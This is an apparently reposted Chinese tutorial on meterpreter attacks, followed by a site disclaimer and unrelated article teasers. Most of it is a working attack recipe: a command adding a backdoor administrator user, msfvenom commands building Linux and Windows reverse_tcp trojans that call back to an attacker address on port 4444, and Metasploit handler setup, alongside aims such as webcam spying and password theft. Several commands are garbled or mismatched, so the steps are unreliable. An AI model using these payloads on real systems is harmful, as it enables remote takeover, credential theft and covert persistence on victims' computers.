【网络安全】meterpreter攻击实战

1.meterpreter 攻击成功后可以做什么指令?

远程控制+命令执行+摄像头监控+密码获取+创建后门用户+破坏篡改系统。

2.创建后门用户并开启远程连接:

net user zhangsan 123456/add && net localgroup adminstrators zhangsan/add

exit

run getgul -e

3.攻击系统:

①reverse_tcp是一个基于TCP的反向链接反弹shell, 使用起来很稳定:

msf>use exploit/multi/handler

msf exploit(multi/handler)>set payload linux/x86/meterpreter/reverse_tcp

②生成一个Linux下反弹shell木马:

【报错】msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444  -f elf -o shell

【正确】msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell

③目录下已经成功生成木马文件shell。

然后我们给文件加上可执行权限。(成功设置后,显示绿色)

然后我们打开Metasploit,使用模块handler,设置payload,注意:这里设置的payload要和我们生成木马所使用的payload一样。

root@kali:~# ls

root@kali:~# chmod +x shell

root@kali:~# ls

(ls:显示指定工作目录下之内容)

(chmod:控制用户对文件的权限的命令

chmod +x:增加可执行权限,在root权限下设置,否则会报错)

④设置下地址和端口,开始监听并运行

【报错】msfvenom -p  windows/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444  -f exe -o shell.exe

【正确】msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe

⑤输入以下指令,指定监听攻击模块,载荷,IP,端口:

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp 

set lhost 192.168.195.129

set lport 10002

set rhost 192.168.195.130

exploit

注:

端口被占用,查出进程并杀掉:

lsof -i:[端口号]

kill[进程号]

等待攻击完成ing,会话卡死,端口号不一致导致

重来!
=============================================================================


攻击机:kali linux x64
目标机:win10 x64
步骤:

①sudo su

②kali

③msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f elf > shell

④msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.195.129 lport=4444 -f exe > shell.exe

⑤msfconsole

⑥use exploit/multi/handler

⑦set payload windows/x64/meterpreter/reverse_tcp 

⑧set LHOST 192.168.195.129

⑨set LPORT 4444

⑩run

【不需要】set RHOSTS 192.168.195.131

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/236305.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

如何计算数据泄露的成本

现在,几乎所有类型的组织每天都在发生企业 IT 网络遭到破坏的情况。它们是任何合规官员最担心的问题,并且找出更好的方法来防止它们或从中恢复是合规官员永远不会远离的想法。 但数据泄露的实际成本是多少?该数字从何而来?当您获…

Transformer中的多头注意力机制-为什么需要多头?

Transformer为什么使用多头注意力机制呢? 多头可以学习到不同维度的特征和信息。为什么可以学习到不同维度的信息呢? 答案是:多头注意力机制的组成是有单个的self attention,由于self attention通过产生QKV矩阵来学习数据特征&a…

中信建投在金融电于化期刊发布 DataOps 实践

文 ‖ 中信建投证券股份有限公司 马丽霞 高宇航 李可 许哲 李海伟 近年来,数据的分析和应用对各行各工业的业务模式和竞争形态进行重塑,而积极应对挑战和顺应时代变化是各个市场参与者的必选项。作为资本市场数字化转型的领航者,中信建投证券…

时序预测 | Python实现TCN时间卷积神经网络价格预测

时序预测 | Python实现TCN时间卷积神经网络时间序列预测 目录 时序预测 | Python实现TCN时间卷积神经网络时间序列预测预测效果基本介绍模型描述程序设计参考资料预测效果 基本介绍 时间卷积网络,TCN。 利用CNN技术处理时间序列数据。 卷基础层有三种,第一种是一维CNN,用于输…

WebUI工作流插件超越ComfyUI

在AI绘画领域,Stable Diffsion是最受欢迎的,因为它是开源软件。 开源有两大优势,一是免费,二是适合折腾。 大量的开发者、爱好者投入无尽的热情,来推动Stable Diffsion的快速发展。 在图形界面方面,WebU…

Aria2 开发历程 (4) --使用RPC与 Aria2 进行通讯

结合这段时间搜集到到资料,比较理想的方案是通过RPC(websocket)来与运行时的Aria2(必须是运作中)进行通讯。 在配置文件和命令行都有RPC的相关配置: 例如:配置文件中的: ## RPC 设置 ### 启用 JSON-RPC/XML-RPC 服务…

麒麟操作系统网桥配置

网桥概念: Bridge 是 Linux 上用来做 TCP/IP 二层协议交换的设备,其功能可 以简单的理解为是一个二层交换机或者 Hub;多个网络设备可以连接 到同一个 Bridge,当某个设备收到数据包时,Bridge 会将数据转发 给其他设备。…

Re8 Generative Modeling by Estimating Gradients of the Data Distribution

宋扬博士的作品,和DDPM同属扩散模型开创工作,但二者的技术路线不同 Introduction 当前生成模型主要分成两类 基于似然模型 通过近似最大似然直接学习分布的概率密度,如VAE 隐式生成模型 概率分布由其抽样过程的模型隐式表示&#xff0c…

Git常用命令#切换分支

要在 Git 中切换分支,你可以使用 git checkout 命令。 a.创建新分支并切换到该分支 如果你想要创建一个新分支并立即切换到该分支,可以使用以下命令: git checkout -b 新分支名这会创建一个名为 新分支名 的新分支,并将你的工作目…

golang WaitGroup的使用与底层实现

使用的go版本为 go1.21.2 首先我们写一个简单的WaitGroup的使用代码 package mainimport ("fmt""sync" )func main() {var wg sync.WaitGroupwg.Add(1)go func() {defer wg.Done()fmt.Println("xiaochuan")}()wg.Wait() }WaitGroup的基本使用场…

如何判断数据库慢 SQL 查询?

慢 SQL 查询通常指执行时间较长或者消耗大量系统资源的查询。要判断一个 SQL 查询是否慢,可以考虑以下几个方面: 执行时间: 观察查询执行所需的时间。如果一个查询花费了相对较长的时间才能返回结果,可能就是慢查询的一个指标。通…

计算机硬件(一)

1.机箱 计算机的许多硬件,如主板,硬盘和电源等,都安放在固定机箱中。机箱是一个相对封闭的空间,箱体一般由钢和铝合金等金属制成(其他材料亦可用,但不多见),同时设有许多通风口,以促进箱内空气流动,防止内部温度过高,机箱的颜色,大小乃至形状…